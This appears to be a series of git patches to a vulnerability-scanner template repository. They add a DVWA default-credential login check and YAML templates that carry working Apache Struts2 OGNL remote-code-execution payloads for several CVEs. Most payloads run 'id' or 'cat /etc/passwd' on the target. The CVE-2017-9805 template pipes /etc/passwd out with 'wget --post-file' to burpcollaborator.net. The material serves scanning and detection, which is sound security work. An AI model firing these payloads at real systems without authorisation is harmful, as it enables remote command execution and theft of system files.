From b7d781015ca0acddb2f2a08507c19f8d4159592a Mon Sep 17 00:00:00 2001 From: sandeep <8293321+bauthard@users.noreply.github.com> Date: Sat, 20 Feb 2021 14:21:54 +0530 Subject: [PATCH 001/370] Adding dvwa default login --- default-logins/dvwa/dvwa-default-login.yaml | 44 +++++++++++++++++++++ 1 file changed, 44 insertions(+) create mode 100644 default-logins/dvwa/dvwa-default-login.yaml diff --git a/default-logins/dvwa/dvwa-default-login.yaml b/default-logins/dvwa/dvwa-default-login.yaml new file mode 100644 index 0000000000..4e6c82a9c9 --- /dev/null +++ b/default-logins/dvwa/dvwa-default-login.yaml @@ -0,0 +1,44 @@ +id: dvwa-default-login +info: + name: DVWA Default Login + author: pdteam + severity: critical + +requests: + - raw: + - | + GET /login.php HTTP/1.1 + Host: {{Hostname}} + Accept-Language: en-GB,en-US;q=0.9,en;q=0.8 + Connection: close + + - | + POST /login.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + Cookie: PHPSESSID={{session}}; security=low + Connection: close + + username=admin&password=password&Login=Login&user_token={{token}} + + extractors: + - type: regex + name: token + group: 1 + internal: true + part: body + regex: + - "hidden' name='user_token' value='([0-9a-z]+)'" + + - type: kval + name: session + internal: true + part: body + kval: + - PHPSESSID + + redirects: true + matchers: + - type: word + words: + - "You have logged in as 'admin'" From 1308df85eaf7d4ca7c15e10edbfcc8226461de5e Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sat, 20 Feb 2021 08:52:33 +0000 Subject: [PATCH 002/370] Auto Update README [Sat Feb 20 08:52:33 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 22ae188369..16923bd888 100644 --- a/README.md +++ b/README.md @@ -39,11 +39,11 @@ An overview of the nuclei template directory including number of templates assoc | -------------- | ------------------------------ | --------------- | ------------------------------- | ---------------- | ------------------------------ | | cves | 198 | vulnerabilities | 91 | exposed-panels | 74 | | exposures | 47 | technologies | 46 | misconfiguration | 43 | -| workflows | 21 | miscellaneous | 12 | default-logins | 10 | +| workflows | 21 | miscellaneous | 12 | default-logins | 11 | | exposed-tokens | 9 | dns | 6 | fuzzing | 4 | | helpers | 2 | takeovers | 1 | - | - | -**61 directories, 573 files**. +**62 directories, 574 files**. From d7ab8a24440e7cdd953fd40044cc0ddae1b288f4 Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Sun, 21 Feb 2021 13:57:34 +0000 Subject: [PATCH 003/370] add CVE-2007-4556 --- cves/2007/CVE-2007-4556.yaml | 29 +++++++++++++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 cves/2007/CVE-2007-4556.yaml diff --git a/cves/2007/CVE-2007-4556.yaml b/cves/2007/CVE-2007-4556.yaml new file mode 100644 index 0000000000..effef1fcdb --- /dev/null +++ b/cves/2007/CVE-2007-4556.yaml @@ -0,0 +1,29 @@ +id: CVE-2007-4556 + +info: + name: Apache Struts2 S2-001 RCE + author: pikpikcu + severity: critical + reference: https://www.guildhab.top/?p=2326 + tags: cve, cve2007,apache,rce + +requests: + - method: POST + path: + - "{{BaseURL}}/login.action" + headers: + Content-Type: application/x-www-form-urlencoded + body: | + username=test&password=%25%7B123456789*987654321%7D + + matchers-condition: and + matchers: + + - type: word + words: + - "-67153019" + condition: and + + - type: status + status: + - 200 From b25bf4448ee6de296f25f4c1fe6139ee2e5a0d81 Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Sun, 21 Feb 2021 13:59:05 +0000 Subject: [PATCH 004/370] Create CVE-2012-0838.yaml --- cves/2012/CVE-2012-0838.yaml | 29 +++++++++++++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 cves/2012/CVE-2012-0838.yaml diff --git a/cves/2012/CVE-2012-0838.yaml b/cves/2012/CVE-2012-0838.yaml new file mode 100644 index 0000000000..dd5331204f --- /dev/null +++ b/cves/2012/CVE-2012-0838.yaml @@ -0,0 +1,29 @@ +id: CVE-2012-0838 + +info: + name: Apache Struts2 S2-007 RCE + author: pikpikcu + severity: critical + reference: https://blog.csdn.net/weixin_43416469/article/details/113849942 + tags: cve, cve2012,apache,rce + +requests: + - method: POST + path: + - "{{BaseURL}}/user.action" + headers: + Content-Type: application/x-www-form-urlencoded + body: | + name=tes&email=tes&age=%27+%2B+%28%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23foo%3Dnew+java.lang.Boolean%28%22false%22%29+%2C%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3D%23foo%2C%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%27id%27%29.getInputStream%28%29%29%29+%2B+%27 + + matchers-condition: and + matchers: + + - type: regex + regex: + - "uid=*" + condition: and + + - type: status + status: + - 200 From cdaef9c5256d7f6d91e22456bf631cca1cd84f52 Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Sun, 21 Feb 2021 13:59:42 +0000 Subject: [PATCH 005/370] Create CVE-2012-0392.yaml --- cves/2012/CVE-2012-0392.yaml | 25 +++++++++++++++++++++++++ 1 file changed, 25 insertions(+) create mode 100644 cves/2012/CVE-2012-0392.yaml diff --git a/cves/2012/CVE-2012-0392.yaml b/cves/2012/CVE-2012-0392.yaml new file mode 100644 index 0000000000..d89fe41d73 --- /dev/null +++ b/cves/2012/CVE-2012-0392.yaml @@ -0,0 +1,25 @@ +id: CVE-2012-0392 + +info: + name: Apache Struts2 S2-008 RCE + author: pikpikcu + severity: critical + reference: https://blog.csdn.net/weixin_43416469/article/details/113850545 + tags: cve, cve2012,apache,rce + +requests: + - method: GET + path: + - "{{BaseURL}}/devmode.action?debug=command&expression=(%23_memberAccess[%22allowStaticMethodAccess%22]%3Dtrue%2C%23foo%3Dnew%20java.lang.Boolean(%22false%22)%20%2C%23context[%22xwork.MethodAccessor.denyMethodExecution%22]%3D%23foo%2C@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(%27cat%20/etc/passwd%27).getInputStream()))" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:[x*]:0:0" + condition: and + + - type: status + status: + - 200 From fc14c602b6e02f9472a2ab1d612908d591a36ae5 Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Sun, 21 Feb 2021 14:01:07 +0000 Subject: [PATCH 006/370] Create CVE-2017-9805.yaml --- cves/2017/CVE-2017-9805.yaml | 37 ++++++++++++++++++++++++++++++++++++ 1 file changed, 37 insertions(+) create mode 100644 cves/2017/CVE-2017-9805.yaml diff --git a/cves/2017/CVE-2017-9805.yaml b/cves/2017/CVE-2017-9805.yaml new file mode 100644 index 0000000000..a264ac651a --- /dev/null +++ b/cves/2017/CVE-2017-9805.yaml @@ -0,0 +1,37 @@ +id: CVE-2017-9805 + +info: + name: Apache Struts2 S2-052 RCE + author: pikpikcu + severity: critical + reference: https://nvd.nist.gov/vuln/detail/CVE-2017-9805 + tags: cve, cve2017,apache,rce + +# ref: https://medium.com/@blackriddle/apache-struts2-rce-cve-2017-9805-4c6f58b622cb + +requests: + - method: POST + path: + - "{{BaseURL}}/struts2-rest-showcase/orders/3" + - "{{BaseURL}}/orders" + headers: + Content-Type: application/xml + body: | + + + 0 false 0 wget --post-file /etc/passwd burpcollaborator.net false java.lang.ProcessBuilder start foo foo false 0 0 false false 0 + + + + matchers-condition: and + matchers: + + - type: word + words: + - "Debugging information" + - "com.thoughtworks.xstream.converters.collections.MapConverter" + condition: and + + - type: status + status: + - 500 From 3e111595bfb2867aacb6966884b9bb60e3a3ce27 Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Sun, 21 Feb 2021 14:01:50 +0000 Subject: [PATCH 007/370] Create CVE-2017-12611.yaml --- cves/2017/CVE-2017-12611.yaml | 25 +++++++++++++++++++++++++ 1 file changed, 25 insertions(+) create mode 100644 cves/2017/CVE-2017-12611.yaml diff --git a/cves/2017/CVE-2017-12611.yaml b/cves/2017/CVE-2017-12611.yaml new file mode 100644 index 0000000000..7ead98e310 --- /dev/null +++ b/cves/2017/CVE-2017-12611.yaml @@ -0,0 +1,25 @@ +id: CVE-2017-12611 + +info: + name: Apache Struts2 S2-053 RCE + author: pikpikcu + severity: critical + reference: https://nvd.nist.gov/vuln/detail/CVE-2017-12611 + tags: cve, cve2017,apache,rce + +requests: + - method: POST + path: + - "{{BaseURL}}/?name=%25%7B%28%23dm%3D%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS%29.%28%23_memberAccess%3F%28%23_memberAccess%3D%23dm%29%3A%28%28%23container%3D%23context%5B%27com.opensymphony.xwork2.ActionContext.container%27%5D%29.%28%23ognlUtil%3D%23container.getInstance%28%40com.opensymphony.xwork2.ognl.OgnlUtil%40class%29%29.%28%23ognlUtil.getExcludedPackageNames%28%29.clear%28%29%29.%28%23ognlUtil.getExcludedClasses%28%29.clear%28%29%29.%28%23context.setMemberAccess%28%23dm%29%29%29%29.%28%23cmd%3D%27cat%20/etc/passwd%27%29.%28%23iswin%3D%28%40java.lang.System%40getProperty%28%27os.name%27%29.toLowerCase%28%29.contains%28%27win%27%29%29%29.%28%23cmds%3D%28%23iswin%3F%7B%27cmd.exe%27%2C%27/c%27%2C%23cmd%7D%3A%7B%27/bin/bash%27%2C%27-c%27%2C%23cmd%7D%29%29.%28%23p%3Dnew%20java.lang.ProcessBuilder%28%23cmds%29%29.%28%23p.redirectErrorStream%28true%29%29.%28%23process%3D%23p.start%28%29%29.%28%40org.apache.commons.io.IOUtils%40toString%28%23process.getInputStream%28%29%29%29%7D" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:[x*]:0:0" + condition: and + + - type: status + status: + - 200 From d3ee89f5928f2021124f8ec59a5c7e8e1577a6a1 Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Sun, 21 Feb 2021 14:23:04 +0000 Subject: [PATCH 008/370] Create CVE-2013-1966.yaml --- cves/2013/CVE-2013-1966.yaml | 32 ++++++++++++++++++++++++++++++++ 1 file changed, 32 insertions(+) create mode 100644 cves/2013/CVE-2013-1966.yaml diff --git a/cves/2013/CVE-2013-1966.yaml b/cves/2013/CVE-2013-1966.yaml new file mode 100644 index 0000000000..caff849b45 --- /dev/null +++ b/cves/2013/CVE-2013-1966.yaml @@ -0,0 +1,32 @@ +id: CVE-2013-1966 + +info: + name: Apache Struts2 S2-013 RCE + author: pikpikcu + severity: critical + reference: https://blog.csdn.net/weixin_43416469/article/details/113636581?utm_medium=distribute.pc_relevant_t0.none-task-blog-OPENSEARCH-1.control&dist_request_id=979f56d5-0937-4e8d-8e1e-79f3a5d24e14&depth_1-utm_source=distribute.pc_relevant_t0.none-task-blog-OPENSEARCH-1.control + tags: cve, cve2013,apache,rce + +requests: + - method: GET + path: + - "{{BaseURL}}/link.action?a=%24%7b%23%5f%6d%65%6d%62%65%72%41%63%63%65%73%73%5b%22%61%6c%6c%6f%77%53%74%61%74%69%63%4d%65%74%68%6f%64%41%63%63%65%73%73%22%5d%3d%74%72%75%65%2c%23%61%3d%40%6a%61%76%61%2e%6c%61%6e%67%2e%52%75%6e%74%69%6d%65%40%67%65%74%52%75%6e%74%69%6d%65%28%29%2e%65%78%65%63%28%27%63%61%74%20%2f%65%74%63%2f%70%61%73%73%77%64%27%29%2e%67%65%74%49%6e%70%75%74%53%74%72%65%61%6d%28%29%2c%23%62%3d%6e%65%77%20%6a%61%76%61%2e%69%6f%2e%49%6e%70%75%74%53%74%72%65%61%6d%52%65%61%64%65%72%28%23%61%29%2c%23%63%3d%6e%65%77%20%6a%61%76%61%2e%69%6f%2e%42%75%66%66%65%72%65%64%52%65%61%64%65%72%28%23%62%29%2c%23%64%3d%6e%65%77%20%63%68%61%72%5b%35%30%30%30%30%5d%2c%23%63%2e%72%65%61%64%28%23%64%29%2c%23%6f%75%74%3d%40%6f%72%67%2e%61%70%61%63%68%65%2e%73%74%72%75%74%73%32%2e%53%65%72%76%6c%65%74%41%63%74%69%6f%6e%43%6f%6e%74%65%78%74%40%67%65%74%52%65%73%70%6f%6e%73%65%28%29%2e%67%65%74%57%72%69%74%65%72%28%29%2c%23%6f%75%74%2e%70%72%69%6e%74%6c%6e%28%27%64%62%61%70%70%3d%27%2b%6e%65%77%20%6a%61%76%61%2e%6c%61%6e%67%2e%53%74%72%69%6e%67%28%23%64%29%29%2c%23%6f%75%74%2e%63%6c%6f%73%65%28%29%7d" + headers: + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 + Accept-Language: id,en-US;q=0.7,en;q=0.3 + + matchers-condition: and + matchers: + - type: word + words: + - "Content-Type: text/html;charset=UTF-8" + part: header + + - type: regex + regex: + - "root:[x*]:0:0" + condition: and + + - type: status + status: + - 200 From 5273e20ebe7e325c5527b4de0dce598804f58906 Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Sun, 21 Feb 2021 14:54:26 +0000 Subject: [PATCH 009/370] Create CVE-2013-2134.yaml --- cves/2013/CVE-2013-2134.yaml | 32 ++++++++++++++++++++++++++++++++ 1 file changed, 32 insertions(+) create mode 100644 cves/2013/CVE-2013-2134.yaml diff --git a/cves/2013/CVE-2013-2134.yaml b/cves/2013/CVE-2013-2134.yaml new file mode 100644 index 0000000000..124ab83ec5 --- /dev/null +++ b/cves/2013/CVE-2013-2134.yaml @@ -0,0 +1,32 @@ +id: CVE-2013-2134 + +info: + name: Apache Struts2 S2-015 RCE + author: pikpikcu + severity: critical + reference: https://blog.csdn.net/weixin_43416469/article/details/113852197?utm_medium=distribute.pc_relevant.none-task-blog-OPENSEARCH-11.control&dist_request_id=979f56d5-0937-4e8d-8e1e-79f3a5d24e14&depth_1-utm_source=distribute.pc_relevant.none-task-blog-OPENSEARCH-11.control + tags: cve, cve2013,apache,rce + +requests: + - method: GET + path: + - "{{BaseURL}}/param.action?message=%25%7b%23%61%3d%28%6e%65%77%20%6a%61%76%61%2e%6c%61%6e%67%2e%50%72%6f%63%65%73%73%42%75%69%6c%64%65%72%28%6e%65%77%20%6a%61%76%61%2e%6c%61%6e%67%2e%53%74%72%69%6e%67%5b%5d%7b%22%63%61%74%20%2f%65%74%63%2f%70%61%73%73%77%64%22%7d%29%29%2e%72%65%64%69%72%65%63%74%45%72%72%6f%72%53%74%72%65%61%6d%28%74%72%75%65%29%2e%73%74%61%72%74%28%29%2c%23%62%3d%23%61%2e%67%65%74%49%6e%70%75%74%53%74%72%65%61%6d%28%29%2c%23%63%3d%6e%65%77%20%6a%61%76%61%2e%69%6f%2e%49%6e%70%75%74%53%74%72%65%61%6d%52%65%61%64%65%72%28%23%62%29%2c%23%64%3d%6e%65%77%20%6a%61%76%61%2e%69%6f%2e%42%75%66%66%65%72%65%64%52%65%61%64%65%72%28%23%63%29%2c%23%65%3d%6e%65%77%20%63%68%61%72%5b%35%30%30%30%30%5d%2c%23%64%2e%72%65%61%64%28%23%65%29%2c%23%66%3d%23%63%6f%6e%74%65%78%74%2e%67%65%74%28%22%63%6f%6d%2e%6f%70%65%6e%73%79%6d%70%68%6f%6e%79%2e%78%77%6f%72%6b%32%2e%64%69%73%70%61%74%63%68%65%72%2e%48%74%74%70%53%65%72%76%6c%65%74%52%65%73%70%6f%6e%73%65%22%29%2c%23%66%2e%67%65%74%57%72%69%74%65%72%28%29%2e%70%72%69%6e%74%6c%6e%28%6e%65%77%20%6a%61%76%61%2e%6c%61%6e%67%2e%53%74%72%69%6e%67%28%23%65%29%29%2c%23%66%2e%67%65%74%57%72%69%74%65%72%28%29%2e%66%6c%75%73%68%28%29%2c%23%66%2e%67%65%74%57%72%69%74%65%72%28%29%2e%63%6c%6f%73%65%28%29%7d" + headers: + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 + Accept-Language: id,en-US;q=0.7,en;q=0.3 + + matchers-condition: and + matchers: + - type: word + words: + - "Content-Type: text/html" + part: header + + - type: regex + regex: + - "root:[x*]:0:0" + condition: and + + - type: status + status: + - 200 From 2b8572d15e8ccb4acc3229e943dbf9bf5fbf6bc0 Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Sun, 21 Feb 2021 15:39:29 +0000 Subject: [PATCH 010/370] Create CVE-2017-9791.yaml --- cves/2017/CVE-2017-9791.yaml | 33 +++++++++++++++++++++++++++++++++ 1 file changed, 33 insertions(+) create mode 100644 cves/2017/CVE-2017-9791.yaml diff --git a/cves/2017/CVE-2017-9791.yaml b/cves/2017/CVE-2017-9791.yaml new file mode 100644 index 0000000000..d627ab66e8 --- /dev/null +++ b/cves/2017/CVE-2017-9791.yaml @@ -0,0 +1,33 @@ +id: CVE-2017-9791 + +info: + name: Apache Struts2 S2-053 RCE + author: pikpikcu + severity: critical + reference: https://nvd.nist.gov/vuln/detail/CVE-2017-9791 + tags: cve, cve2017,apache,rce + +requests: + - method: POST + path: + - "{{BaseURL}}/integration/saveGangster.action" + headers: + Content-Type: application/x-www-form-urlencoded + body: | + name=%25%7b%28%23%64%6d%3d%40%6f%67%6e%6c%2e%4f%67%6e%6c%43%6f%6e%74%65%78%74%40%44%45%46%41%55%4c%54%5f%4d%45%4d%42%45%52%5f%41%43%43%45%53%53%29%2e%28%23%5f%6d%65%6d%62%65%72%41%63%63%65%73%73%3f%28%23%5f%6d%65%6d%62%65%72%41%63%63%65%73%73%3d%23%64%6d%29%3a%28%28%23%63%6f%6e%74%61%69%6e%65%72%3d%23%63%6f%6e%74%65%78%74%5b%27%63%6f%6d%2e%6f%70%65%6e%73%79%6d%70%68%6f%6e%79%2e%78%77%6f%72%6b%32%2e%41%63%74%69%6f%6e%43%6f%6e%74%65%78%74%2e%63%6f%6e%74%61%69%6e%65%72%27%5d%29%2e%28%23%6f%67%6e%6c%55%74%69%6c%3d%23%63%6f%6e%74%61%69%6e%65%72%2e%67%65%74%49%6e%73%74%61%6e%63%65%28%40%63%6f%6d%2e%6f%70%65%6e%73%79%6d%70%68%6f%6e%79%2e%78%77%6f%72%6b%32%2e%6f%67%6e%6c%2e%4f%67%6e%6c%55%74%69%6c%40%63%6c%61%73%73%29%29%2e%28%23%6f%67%6e%6c%55%74%69%6c%2e%67%65%74%45%78%63%6c%75%64%65%64%50%61%63%6b%61%67%65%4e%61%6d%65%73%28%29%2e%63%6c%65%61%72%28%29%29%2e%28%23%6f%67%6e%6c%55%74%69%6c%2e%67%65%74%45%78%63%6c%75%64%65%64%43%6c%61%73%73%65%73%28%29%2e%63%6c%65%61%72%28%29%29%2e%28%23%63%6f%6e%74%65%78%74%2e%73%65%74%4d%65%6d%62%65%72%41%63%63%65%73%73%28%23%64%6d%29%29%29%29%2e%28%23%71%3d%40%6f%72%67%2e%61%70%61%63%68%65%2e%63%6f%6d%6d%6f%6e%73%2e%69%6f%2e%49%4f%55%74%69%6c%73%40%74%6f%53%74%72%69%6e%67%28%40%6a%61%76%61%2e%6c%61%6e%67%2e%52%75%6e%74%69%6d%65%40%67%65%74%52%75%6e%74%69%6d%65%28%29%2e%65%78%65%63%28%27%63%61%74%20%2f%65%74%63%2f%70%61%73%73%77%64%27%29%2e%67%65%74%49%6e%70%75%74%53%74%72%65%61%6d%28%29%29%29%2e%28%23%71%29%7d&age=10&__checkbox_bustedBefore=true&description= + + matchers-condition: and + matchers: + - type: word + words: + - "Content-Type: text/html" + part: header + + - type: regex + regex: + - "root:[x*]:0:0" + condition: and + + - type: status + status: + - 200 From 1707534f0119d7cec01b8313d7c3e13729349818 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+bauthard@users.noreply.github.com> Date: Mon, 22 Feb 2021 01:48:07 +0530 Subject: [PATCH 011/370] misc fixes --- cves/2007/CVE-2007-4556.yaml | 2 +- cves/2012/CVE-2012-0838.yaml | 2 +- cves/2013/CVE-2013-1966.yaml | 4 ++-- cves/2013/CVE-2013-2134.yaml | 4 ++-- cves/2017/CVE-2017-9805.yaml | 12 +++++------- 5 files changed, 11 insertions(+), 13 deletions(-) diff --git a/cves/2007/CVE-2007-4556.yaml b/cves/2007/CVE-2007-4556.yaml index effef1fcdb..9fdb8d6165 100644 --- a/cves/2007/CVE-2007-4556.yaml +++ b/cves/2007/CVE-2007-4556.yaml @@ -12,7 +12,7 @@ requests: path: - "{{BaseURL}}/login.action" headers: - Content-Type: application/x-www-form-urlencoded + Content-Type: application/x-www-form-urlencoded body: | username=test&password=%25%7B123456789*987654321%7D diff --git a/cves/2012/CVE-2012-0838.yaml b/cves/2012/CVE-2012-0838.yaml index dd5331204f..15c550993f 100644 --- a/cves/2012/CVE-2012-0838.yaml +++ b/cves/2012/CVE-2012-0838.yaml @@ -12,7 +12,7 @@ requests: path: - "{{BaseURL}}/user.action" headers: - Content-Type: application/x-www-form-urlencoded + Content-Type: application/x-www-form-urlencoded body: | name=tes&email=tes&age=%27+%2B+%28%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23foo%3Dnew+java.lang.Boolean%28%22false%22%29+%2C%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3D%23foo%2C%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%27id%27%29.getInputStream%28%29%29%29+%2B+%27 diff --git a/cves/2013/CVE-2013-1966.yaml b/cves/2013/CVE-2013-1966.yaml index caff849b45..95e8844d27 100644 --- a/cves/2013/CVE-2013-1966.yaml +++ b/cves/2013/CVE-2013-1966.yaml @@ -12,8 +12,8 @@ requests: path: - "{{BaseURL}}/link.action?a=%24%7b%23%5f%6d%65%6d%62%65%72%41%63%63%65%73%73%5b%22%61%6c%6c%6f%77%53%74%61%74%69%63%4d%65%74%68%6f%64%41%63%63%65%73%73%22%5d%3d%74%72%75%65%2c%23%61%3d%40%6a%61%76%61%2e%6c%61%6e%67%2e%52%75%6e%74%69%6d%65%40%67%65%74%52%75%6e%74%69%6d%65%28%29%2e%65%78%65%63%28%27%63%61%74%20%2f%65%74%63%2f%70%61%73%73%77%64%27%29%2e%67%65%74%49%6e%70%75%74%53%74%72%65%61%6d%28%29%2c%23%62%3d%6e%65%77%20%6a%61%76%61%2e%69%6f%2e%49%6e%70%75%74%53%74%72%65%61%6d%52%65%61%64%65%72%28%23%61%29%2c%23%63%3d%6e%65%77%20%6a%61%76%61%2e%69%6f%2e%42%75%66%66%65%72%65%64%52%65%61%64%65%72%28%23%62%29%2c%23%64%3d%6e%65%77%20%63%68%61%72%5b%35%30%30%30%30%5d%2c%23%63%2e%72%65%61%64%28%23%64%29%2c%23%6f%75%74%3d%40%6f%72%67%2e%61%70%61%63%68%65%2e%73%74%72%75%74%73%32%2e%53%65%72%76%6c%65%74%41%63%74%69%6f%6e%43%6f%6e%74%65%78%74%40%67%65%74%52%65%73%70%6f%6e%73%65%28%29%2e%67%65%74%57%72%69%74%65%72%28%29%2c%23%6f%75%74%2e%70%72%69%6e%74%6c%6e%28%27%64%62%61%70%70%3d%27%2b%6e%65%77%20%6a%61%76%61%2e%6c%61%6e%67%2e%53%74%72%69%6e%67%28%23%64%29%29%2c%23%6f%75%74%2e%63%6c%6f%73%65%28%29%7d" headers: - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 - Accept-Language: id,en-US;q=0.7,en;q=0.3 + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 + Accept-Language: id,en-US;q=0.7,en;q=0.3 matchers-condition: and matchers: diff --git a/cves/2013/CVE-2013-2134.yaml b/cves/2013/CVE-2013-2134.yaml index 124ab83ec5..c58fa2a8de 100644 --- a/cves/2013/CVE-2013-2134.yaml +++ b/cves/2013/CVE-2013-2134.yaml @@ -12,8 +12,8 @@ requests: path: - "{{BaseURL}}/param.action?message=%25%7b%23%61%3d%28%6e%65%77%20%6a%61%76%61%2e%6c%61%6e%67%2e%50%72%6f%63%65%73%73%42%75%69%6c%64%65%72%28%6e%65%77%20%6a%61%76%61%2e%6c%61%6e%67%2e%53%74%72%69%6e%67%5b%5d%7b%22%63%61%74%20%2f%65%74%63%2f%70%61%73%73%77%64%22%7d%29%29%2e%72%65%64%69%72%65%63%74%45%72%72%6f%72%53%74%72%65%61%6d%28%74%72%75%65%29%2e%73%74%61%72%74%28%29%2c%23%62%3d%23%61%2e%67%65%74%49%6e%70%75%74%53%74%72%65%61%6d%28%29%2c%23%63%3d%6e%65%77%20%6a%61%76%61%2e%69%6f%2e%49%6e%70%75%74%53%74%72%65%61%6d%52%65%61%64%65%72%28%23%62%29%2c%23%64%3d%6e%65%77%20%6a%61%76%61%2e%69%6f%2e%42%75%66%66%65%72%65%64%52%65%61%64%65%72%28%23%63%29%2c%23%65%3d%6e%65%77%20%63%68%61%72%5b%35%30%30%30%30%5d%2c%23%64%2e%72%65%61%64%28%23%65%29%2c%23%66%3d%23%63%6f%6e%74%65%78%74%2e%67%65%74%28%22%63%6f%6d%2e%6f%70%65%6e%73%79%6d%70%68%6f%6e%79%2e%78%77%6f%72%6b%32%2e%64%69%73%70%61%74%63%68%65%72%2e%48%74%74%70%53%65%72%76%6c%65%74%52%65%73%70%6f%6e%73%65%22%29%2c%23%66%2e%67%65%74%57%72%69%74%65%72%28%29%2e%70%72%69%6e%74%6c%6e%28%6e%65%77%20%6a%61%76%61%2e%6c%61%6e%67%2e%53%74%72%69%6e%67%28%23%65%29%29%2c%23%66%2e%67%65%74%57%72%69%74%65%72%28%29%2e%66%6c%75%73%68%28%29%2c%23%66%2e%67%65%74%57%72%69%74%65%72%28%29%2e%63%6c%6f%73%65%28%29%7d" headers: - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 - Accept-Language: id,en-US;q=0.7,en;q=0.3 + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 + Accept-Language: id,en-US;q=0.7,en;q=0.3 matchers-condition: and matchers: diff --git a/cves/2017/CVE-2017-9805.yaml b/cves/2017/CVE-2017-9805.yaml index a264ac651a..3e11c53b73 100644 --- a/cves/2017/CVE-2017-9805.yaml +++ b/cves/2017/CVE-2017-9805.yaml @@ -5,9 +5,7 @@ info: author: pikpikcu severity: critical reference: https://nvd.nist.gov/vuln/detail/CVE-2017-9805 - tags: cve, cve2017,apache,rce - -# ref: https://medium.com/@blackriddle/apache-struts2-rce-cve-2017-9805-4c6f58b622cb + tags: cve,cve2017,apache,rce requests: - method: POST @@ -17,10 +15,10 @@ requests: headers: Content-Type: application/xml body: | - - - 0 false 0 wget --post-file /etc/passwd burpcollaborator.net false java.lang.ProcessBuilder start foo foo false 0 0 false false 0 - + + + 0 false 0 wget --post-file /etc/passwd burpcollaborator.net false java.lang.ProcessBuilder start foo foo false 0 0 false false 0 + matchers-condition: and From e532df34504f7de7963ae9c1aa44531eb44bb6c6 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+bauthard@users.noreply.github.com> Date: Mon, 22 Feb 2021 01:50:57 +0530 Subject: [PATCH 012/370] more changes --- cves/2007/CVE-2007-4556.yaml | 2 +- cves/2012/CVE-2012-0838.yaml | 2 +- cves/2013/CVE-2013-1966.yaml | 2 +- cves/2013/CVE-2013-2134.yaml | 2 +- 4 files changed, 4 insertions(+), 4 deletions(-) diff --git a/cves/2007/CVE-2007-4556.yaml b/cves/2007/CVE-2007-4556.yaml index 9fdb8d6165..6a6da29d52 100644 --- a/cves/2007/CVE-2007-4556.yaml +++ b/cves/2007/CVE-2007-4556.yaml @@ -5,7 +5,7 @@ info: author: pikpikcu severity: critical reference: https://www.guildhab.top/?p=2326 - tags: cve, cve2007,apache,rce + tags: cve,cve2007,apache,rce requests: - method: POST diff --git a/cves/2012/CVE-2012-0838.yaml b/cves/2012/CVE-2012-0838.yaml index 15c550993f..bf8edf7149 100644 --- a/cves/2012/CVE-2012-0838.yaml +++ b/cves/2012/CVE-2012-0838.yaml @@ -5,7 +5,7 @@ info: author: pikpikcu severity: critical reference: https://blog.csdn.net/weixin_43416469/article/details/113849942 - tags: cve, cve2012,apache,rce + tags: cve,cve2012,apache,rce requests: - method: POST diff --git a/cves/2013/CVE-2013-1966.yaml b/cves/2013/CVE-2013-1966.yaml index 95e8844d27..b2a30a9242 100644 --- a/cves/2013/CVE-2013-1966.yaml +++ b/cves/2013/CVE-2013-1966.yaml @@ -5,7 +5,7 @@ info: author: pikpikcu severity: critical reference: https://blog.csdn.net/weixin_43416469/article/details/113636581?utm_medium=distribute.pc_relevant_t0.none-task-blog-OPENSEARCH-1.control&dist_request_id=979f56d5-0937-4e8d-8e1e-79f3a5d24e14&depth_1-utm_source=distribute.pc_relevant_t0.none-task-blog-OPENSEARCH-1.control - tags: cve, cve2013,apache,rce + tags: cve,cve2013,apache,rce requests: - method: GET diff --git a/cves/2013/CVE-2013-2134.yaml b/cves/2013/CVE-2013-2134.yaml index c58fa2a8de..b27abb6fbf 100644 --- a/cves/2013/CVE-2013-2134.yaml +++ b/cves/2013/CVE-2013-2134.yaml @@ -5,7 +5,7 @@ info: author: pikpikcu severity: critical reference: https://blog.csdn.net/weixin_43416469/article/details/113852197?utm_medium=distribute.pc_relevant.none-task-blog-OPENSEARCH-11.control&dist_request_id=979f56d5-0937-4e8d-8e1e-79f3a5d24e14&depth_1-utm_source=distribute.pc_relevant.none-task-blog-OPENSEARCH-11.control - tags: cve, cve2013,apache,rce + tags: cve,cve2013,apache,rce requests: - method: GET From b6091f90906eeb14a4c06eefcc0d67befa9fb8b2 Mon Sep 17 00:00:00 2001 From: 